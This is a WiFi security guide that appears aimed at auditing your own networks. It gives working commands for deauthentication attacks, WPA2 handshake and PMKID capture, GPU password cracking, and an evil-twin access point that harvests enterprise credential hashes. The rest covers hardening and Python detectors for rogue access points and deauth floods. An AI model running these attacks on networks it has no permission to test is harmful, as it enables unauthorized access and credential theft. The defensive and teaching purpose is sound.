Wireless networks are everywhere — office WiFi, home networks, IoT devices, guest networks. Each one represents an attack surface that is literally accessible without physical entry to your building. Understanding how WiFi attacks work helps you audit and defend your own networks. This guide covers real wireless security techniques with commands, from basic reconnaissance to WPA2 cracking and defense.
Understanding WiFi Security Standards
WEP (Wired Equivalent Privacy): Completely broken. Can be cracked in under 2 minutes regardless of password complexity. Still found in old industrial/IoT devices. Never use WEP.
WPA/WPA2-Personal: Uses a Pre-Shared Key (PSK). Vulnerable to offline dictionary attacks if the handshake is captured. WPA2 with a strong password is reasonably secure. Weak or dictionary-based passwords can be cracked.
WPA3: Uses Simultaneous Authentication of Equals (SAE) which prevents offline dictionary attacks. Each connection attempt requires interaction with the AP. Significantly more secure than WPA2. Transition mode allows WPA2/WPA3 mixed environments.
WPA2-Enterprise (802.1X): Uses RADIUS authentication — each user has unique credentials. No shared password to crack. Standard for corporate environments.
Setting Up for WiFi Testing (Kali Linux)
# Recommended adapter: Alfa AWUS036AXML (supports monitor mode + injection)
# Check adapter capabilities
iwconfig
iw list | grep "Supported interface modes" -A 10
# Check if monitor mode is supported
iw phy phy0 info | grep "monitor"
# Set interface to monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Or using airmon-ng (kills interfering processes automatically)
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# This creates a wlan0mon interface
Network Discovery and Reconnaissance
# Scan all nearby networks
sudo airodump-ng wlan0mon
# Output columns:
# BSSID - AP MAC address
# PWR - Signal strength (closer to 0 = stronger)
# Beacons - Number of broadcast frames
# CH - Channel
# ENC - Encryption (WPA2/WPA3/OPN)
# CIPHER - CCMP = strong, TKIP = weaker
# AUTH - PSK = personal, MGT = enterprise
# ESSID - Network name
# Focus on a specific network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# -c 6: Channel 6
# --bssid: Target AP MAC
# -w capture: Save to capture-01.cap
# The wash tool (shipped with reaver) lists WPS-enabled networks (WPS is vulnerable)
wash -i wlan0mon
Capturing the WPA2 4-Way Handshake
WPA2 authentication uses a 4-way handshake between client and AP. If captured, this handshake can be attacked offline. No need to stay near the target — capture it, then crack it anywhere.
# Method 1: Wait for a client to connect naturally
# Run airodump-ng and wait for "WPA handshake: AA:BB:CC:DD:EE:FF" message
# Method 2: Force reconnection with deauth attack (faster)
# Send deauth packets to disconnect a client - they will reconnect automatically
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
# -a: AP MAC
# -c: Client MAC (or omit to deauth all clients)
# --deauth 5: Send 5 deauth packets
# Confirm handshake captured (look for "WPA handshake" in airodump-ng output)
# File saved as: capture-01.cap
# Verify the handshake is in the capture file
aircrack-ng capture-01.cap
# Should show: "1 handshake" next to the target SSID
Cracking WPA2 Passwords
# Method 1: Aircrack-ng dictionary attack (CPU-based)
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
# Method 2: Hashcat (GPU-accelerated, much faster)
# Convert capture to hashcat format
hcxpcapngtool -o hash.22000 capture-01.cap
# Crack with hashcat
hashcat -m 22000 hash.22000 rockyou.txt
hashcat -m 22000 hash.22000 rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Method 3: PMKID attack (no client needed!)
# APs with PMK caching / fast roaming send the PMKID in the first message of the
# 4-way handshake (EAPOL M1) as soon as a station associates, so no connected
# client and no complete handshake are required
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool pmkid.pcapng -o hash.22000
hashcat -m 22000 hash.22000 rockyou.txt
# GPU cracking speed comparison:
# GTX 1080: ~400,000 passwords/second for WPA2
# RTX 4090: ~1,500,000 passwords/second
# Time to crack 8-char lowercase: ~37 hours on RTX 4090
# Time to crack 12-char random: ~hundreds of years
Evil Twin / Rogue Access Point
An evil twin attack creates a fake WiFi network that looks identical to the real one. Victims connect to it and the attacker intercepts all their traffic — including credentials and session cookies over unencrypted or poorly protected connections.
# Create rogue AP with hostapd-wpe (for authorized pentests only)
# hostapd-wpe captures WPA2-Enterprise credentials (usernames + NTLMv2 hashes)
# Install hostapd-wpe
sudo apt install hostapd-wpe
# Configuration: /etc/hostapd-wpe/hostapd-wpe.conf
# Same as target SSID (hostapd does not accept trailing comments on a value line)
ssid=CorporateWiFi
channel=6
wpa=2
wpa_key_mgmt=WPA-EAP
ieee8021x=1
# Start the rogue AP
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# When corporate users connect:
# They get an EAP challenge and respond with their credentials
# hostapd-wpe captures: username + NTLMv2 hash
# Crack the hash: hashcat -m 5600 ntlmv2.txt rockyou.txt
Wireless Security Defense Checklist
For Home Networks
# Check your current WiFi security
nmcli -f SSID,SECURITY dev wifi
# Recommended home WiFi configuration:
# 1. WPA3 Personal (or WPA2/WPA3 transition mode)
# 2. Password: 20+ characters, random (use a password manager)
# Example: "xK9#mP2$vL7@nQ4&wR6!"
# A 20-char random password cannot be cracked in any reasonable timeframe
# 3. Change default router admin credentials
# Username: admin (change this)
# Password: admin/1234/password (NEVER keep these)
# 4. Disable WPS (WiFi Protected Setup)
# WPS PIN can be brute-forced in hours
# 5. Enable router firewall and disable remote management
# 6. Separate IoT devices on a guest/VLAN network
# Smart TVs, cameras, thermostats should NEVER share a network with your laptop
For Corporate Networks
# Cisco WLC: Configure WPA3 Enterprise
# (802.1X with RADIUS)
wlan corp-wifi 1 Corp-WiFi
security wpa akm 802.1x
security wpa wpa2 ciphers aes
security wpa wpa3
# RADIUS server definition (IOS-XE / Catalyst 9800 syntax)
radius server CORP-RADIUS
 address ipv4 192.168.1.100 auth-port 1812 acct-port 1813
 key RADIUS_SECRET
# RADIUS server (FreeRADIUS) configuration
# /etc/freeradius/3.0/users file (reply items go on indented continuation lines):
"john.doe" Cleartext-Password := "SecurePassword"
	Service-Type = Framed-User
# Or integrate with Active Directory for domain authentication
# /etc/freeradius/3.0/mods-enabled/ntlm_auth:
ntlm_auth = "/usr/bin/ntlm_auth --request-nt-key --username=%{%{Stripped-User-Name}:-%{User-Name}} --challenge=%{%{mschap:Challenge}:-00} --nt-response=%{%{mschap:NT-Response}:-00}"
# Wireless IDS: Detect rogue APs
# Cisco WLC automatically detects and contains rogue APs
# Alert thresholds: New AP on corporate channel, same SSID different BSSID
# Check for rogue APs with Kismet
kismet -c wlan0mon
# Look for: Unknown APs on your SSID, unusual clients
Detecting WiFi Attacks
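An added example, not from the original article, that applies the rogue-AP alert rules from the corporate checklist above (same SSID on a BSSID you do not own, an authentication downgrade such as PSK or open where 802.1X is expected, and an unknown AP on a corporate channel) to the CSV that airodump-ng writes next to its capture file when run with -w. The authorized-AP inventory and the CSV rows are constructed; the column layout follows airodump-ng's AP section.

```python
"""Rogue / evil-twin AP check over an airodump-ng CSV export.

Added example, not from the original article. Inventory and sample rows are
constructed; the column layout follows airodump-ng's AP section (the CSV it
writes next to capture-01.cap when run with -w).
"""
import csv
import io

# Assumed inventory of the APs you actually operate: SSID -> authorized BSSIDs and
# the expected AUTH column value (MGT = 802.1X/enterprise, PSK = personal).
AUTHORIZED = {
    "Corp-WiFi": {"bssids": {"AA:BB:CC:DD:EE:01", "AA:BB:CC:DD:EE:02"}, "auth": "MGT"},
    "Corp-WiFi-Guest": {"bssids": {"AA:BB:CC:DD:EE:03"}, "auth": "PSK"},
}

# Constructed capture-01.csv: two genuine corporate APs, two impostors on channel 6,
# and an unrelated neighbour on channel 1.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-05-01 09:00:00, 2024-05-01 09:10:00,  6,  54, WPA2, CCMP, MGT, -38,  310,  0,   0.  0.  0.  0,  9, Corp-WiFi,
AA:BB:CC:DD:EE:02, 2024-05-01 09:00:00, 2024-05-01 09:10:00, 11,  54, WPA2, CCMP, MGT, -51,  290,  0,   0.  0.  0.  0,  9, Corp-WiFi,
DE:AD:BE:EF:00:01, 2024-05-01 09:07:00, 2024-05-01 09:10:00,  6,  54, WPA2, CCMP, PSK, -30,   45,  0,   0.  0.  0.  0,  9, Corp-WiFi,
DE:AD:BE:EF:00:02, 2024-05-01 09:08:00, 2024-05-01 09:10:00,  6,  54, OPN ,     , OPN, -33,   40,  0,   0.  0.  0.  0, 15, Corp-WiFi-Guest,
66:77:88:99:AA:BB, 2024-05-01 09:00:00, 2024-05-01 09:10:00,  1,  54, WPA2, CCMP, PSK, -70,  100,  0,   0.  0.  0.  0, 12, NeighborNet1,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_airodump_csv(text):
    """Return the AP records (dicts keyed by column name) from an airodump-ng CSV."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not any(cell.strip() for cell in row):
            break                                 # blank line ends the AP section
        cells = [cell.strip() for cell in row]
        if header is None:
            header = cells
            continue
        aps.append(dict(zip(header, cells)))
    return aps


def check_rogue_aps(aps, inventory=AUTHORIZED):
    """Apply the checklist's alert rules; returns alert dicts sorted by BSSID."""
    known = {b.upper(): ssid for ssid, e in inventory.items() for b in e["bssids"]}
    # Channels our own APs were seen on: an unknown AP there deserves a look.
    corp_channels = {ap["channel"] for ap in aps if ap["BSSID"].upper() in known}
    alerts = []
    for ap in aps:
        bssid, essid = ap["BSSID"].upper(), ap["ESSID"]
        auth, chan = ap["Authentication"], ap["channel"]
        if bssid in known:
            continue                              # one of ours
        if essid in inventory:
            reasons = ["same SSID on a BSSID not in inventory (possible evil twin)"]
            expected = inventory[essid]["auth"]
            if auth != expected:
                reasons.append(f"auth {auth or 'OPN'} where {expected} expected (downgrade)")
            alerts.append({"bssid": bssid, "essid": essid, "channel": chan,
                           "severity": "high", "reasons": reasons})
        elif chan in corp_channels:
            alerts.append({"bssid": bssid, "essid": essid, "channel": chan,
                           "severity": "low", "reasons": ["unknown AP on a corporate channel"]})
    return sorted(alerts, key=lambda a: a["bssid"])


if __name__ == "__main__":
    for alert in check_rogue_aps(parse_airodump_csv(SAMPLE_CSV)):
        print(f"[{alert['severity'].upper()}] {alert['bssid']} '{alert['essid']}' ch {alert['channel']}:")
        for reason in alert["reasons"]:
            print(f"    - {reason}")
```

Run it against the real capture-01.csv by reading the file into parse_airodump_csv and keeping AUTHORIZED in sync with your WLC or AP inventory; the low-severity rule will fire on neighbours that happen to share a channel, so tune it per site rather than paging on it.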
# Detect deauth attacks with Kismet (sign of active attack or evil twin setup)
kismet-client
# Alert: "Possible deauthentication attack"
# Monitor for deauth frames with tshark
sudo tshark -i wlan0mon -Y "wlan.fc.type_subtype == 0x000c"
# Frame type 0x000c = Deauthentication
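The tshark filter above shows deauth frames as they arrive; an added example (not from the original article) of turning that into an alert: it reads frame metadata exported with tshark's field output, keeps a sliding one-second window per source MAC, and raises an alert when a source sends five or more deauthentication or disassociation frames in that window, noting whether the frames were broadcast (what a deauth run with no client address looks like). The exported lines in SAMPLE_LINES are constructed, not a real capture; the threshold and window are assumptions to tune per site.

```python
"""Deauthentication-flood detector over exported 802.11 frame metadata.

Added example, not from the original article. It assumes frame fields were
exported with tshark, e.g.
  tshark -r capture.pcap -T fields -E separator=, \
      -e frame.time_epoch -e wlan.fc.type_subtype -e wlan.sa -e wlan.da
The lines in SAMPLE_LINES are constructed, not a real capture.
"""
from collections import defaultdict, deque

DEAUTH = 0x0C       # management subtype 12 = Deauthentication (the 0x000c filter above)
DISASSOC = 0x0A     # management subtype 10 = Disassociation; same effect on the client
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample: one ordinary deauth, a beacon, then a burst of broadcast
# deauths spoofed from the AP's address, then a lone disassoc from another source.
SAMPLE_LINES = [
    "1700000000.10,0x000c,aa:bb:cc:dd:ee:ff,11:22:33:44:55:66",
    "1700000001.00,0x0008,aa:bb:cc:dd:ee:ff,ff:ff:ff:ff:ff:ff",   # beacon, ignored
    "1700000005.00,0x000c,aa:bb:cc:dd:ee:ff,ff:ff:ff:ff:ff:ff",
    "1700000005.02,0x000c,aa:bb:cc:dd:ee:ff,ff:ff:ff:ff:ff:ff",
    "1700000005.04,0x000c,aa:bb:cc:dd:ee:ff,ff:ff:ff:ff:ff:ff",
    "1700000005.06,0x000c,aa:bb:cc:dd:ee:ff,ff:ff:ff:ff:ff:ff",
    "1700000005.08,0x000c,aa:bb:cc:dd:ee:ff,ff:ff:ff:ff:ff:ff",
    "1700000005.10,0x000c,aa:bb:cc:dd:ee:ff,ff:ff:ff:ff:ff:ff",
    "1700000009.00,0x000a,99:88:77:66:55:44,11:22:33:44:55:66",   # below threshold
]


def parse_line(line):
    ts, subtype, src, dst = line.strip().split(",")
    # int(x, 0) accepts both "0x000c" and "12", whichever the exporter prints
    return float(ts), int(subtype, 0), src.lower(), dst.lower()


def detect_deauth_floods(lines, window_s=1.0, threshold=5):
    """Alert once per source MAC that sends >= threshold deauth/disassoc frames
    within any window_s seconds. Returns a list of alert dicts."""
    recent = defaultdict(deque)   # source MAC -> deque of (timestamp, destination)
    alerted = set()
    alerts = []
    for line in lines:
        ts, subtype, src, dst = parse_line(line)
        if subtype not in (DEAUTH, DISASSOC):
            continue
        window = recent[src]
        window.append((ts, dst))
        while window and ts - window[0][0] > window_s:
            window.popleft()                      # drop frames older than the window
        if len(window) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({
                "source": src,
                "count": len(window),
                "broadcast": any(d == BROADCAST for _, d in window),
                "first_seen": window[0][0],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_LINES):
        kind = "broadcast" if alert["broadcast"] else "targeted"
        print(f"deauth flood from {alert['source']}: {alert['count']} frames "
              f"({kind}) starting at {alert['first_seen']:.2f}")
```

A flood whose source address is your own AP's BSSID is the signature to watch for: the AP itself rarely sends more than one or two deauths at a time, and it never needs to broadcast them in a burst. Pipe a live tshark field export into this detector line by line to run it continuously.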
# Detect PMKID capture attempts (unusual association requests)
sudo tshark -i wlan0mon -Y "eapol" -V | grep -i "PMKID"
# -V prints the full frame decode; the one-line summary does not contain the PMKID field
# Aircrack-ng fake authentication detection
# Unusual probe requests with your SSID but unknown MAC = possible recon
The most important wireless security lesson: password complexity is the defense against WPA2 cracking. A 20-character random password from a password manager is completely immune to dictionary attacks. The same 20-character password made of dictionary words (example: “correct-horse-battery-staple”) can potentially be cracked with smart rule-based attacks. Use true randomness, use length, and switch to WPA3 as soon as your hardware supports it.
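To put numbers behind that lesson and the GPU figures quoted in the cracking section, here is an added example (not from the original article) that works out the candidate space and the time to exhaust it for the password styles discussed: short random strings, 20 random printable characters, and word-based passphrases. The guess rates are the article's own figures taken as assumptions, the word-list sizes (7776 for a diceware-style list, 2000 for a list of common words an attacker's rules would try first) are assumptions too, and the times are for exhausting the whole space on one GPU, so the expected time to a hit is about half.

```python
"""Worked cracking-cost estimates for WPA2-Personal passwords.

Added example, not part of the original article. The guess rates are the
article's quoted WPA2 (hashcat -m 22000) figures, treated here as assumptions;
the word-list sizes are assumptions as well.
"""
import math

RATES = {"GTX 1080": 400_000, "RTX 4090": 1_500_000}   # guesses per second
ALPHABETS = {"lowercase": 26, "alphanumeric": 62, "printable": 95}
SECONDS_PER_DAY = 86_400
SECONDS_PER_YEAR = 365.25 * SECONDS_PER_DAY


def keyspace_random(length, alphabet_size):
    """Candidates for `length` independently random symbols from an alphabet."""
    return alphabet_size ** length


def keyspace_passphrase(word_count, list_size):
    """Candidates when the attacker knows the word list and the words-only structure.
    This is why a 20-character string of dictionary words is far weaker than 20
    random characters: the attacker guesses words, not characters."""
    return list_size ** word_count


def entropy_bits(keyspace):
    return math.log2(keyspace)


def exhaust_seconds(keyspace, rate):
    """Seconds to try every candidate at `rate` guesses per second."""
    return keyspace / rate


def humanize(seconds):
    if seconds < 3600:
        return f"{seconds / 60:.1f} minutes"
    if seconds < SECONDS_PER_DAY:
        return f"{seconds / 3600:.1f} hours"
    if seconds < SECONDS_PER_YEAR:
        return f"{seconds / SECONDS_PER_DAY:.1f} days"
    return f"{seconds / SECONDS_PER_YEAR:.3g} years"


def scenarios():
    """Candidate-space sizes for the password styles the article discusses."""
    return {
        "8 random lowercase": keyspace_random(8, ALPHABETS["lowercase"]),
        "12 random printable": keyspace_random(12, ALPHABETS["printable"]),
        "20 random printable": keyspace_random(20, ALPHABETS["printable"]),
        "4 words, 7776-word list": keyspace_passphrase(4, 7776),    # assumed diceware-size list
        "4 words, 2000 common words": keyspace_passphrase(4, 2000), # assumed rule/wordlist attack
    }


def report(rate_name="RTX 4090"):
    """Map scenario name -> (entropy in bits, seconds to exhaust at that GPU's rate)."""
    rate = RATES[rate_name]
    return {name: (entropy_bits(ks), exhaust_seconds(ks, rate))
            for name, ks in scenarios().items()}


if __name__ == "__main__":
    for gpu, rate in RATES.items():
        print(f"--- {gpu} ({rate:,} guesses/s) ---")
        for name, (bits, secs) in report(gpu).items():
            print(f"{name:28s} {bits:6.1f} bits   exhaust in {humanize(secs)}")
```

The 8-character lowercase row reproduces the roughly 37-hour figure from the cracking section; the 20-character random row comes out above 128 bits, which is what "cannot be cracked in any reasonable timeframe" means in practice. The two passphrase rows show that what decides the strength of a word-based password is the size of the list the attacker has to search, not the character count.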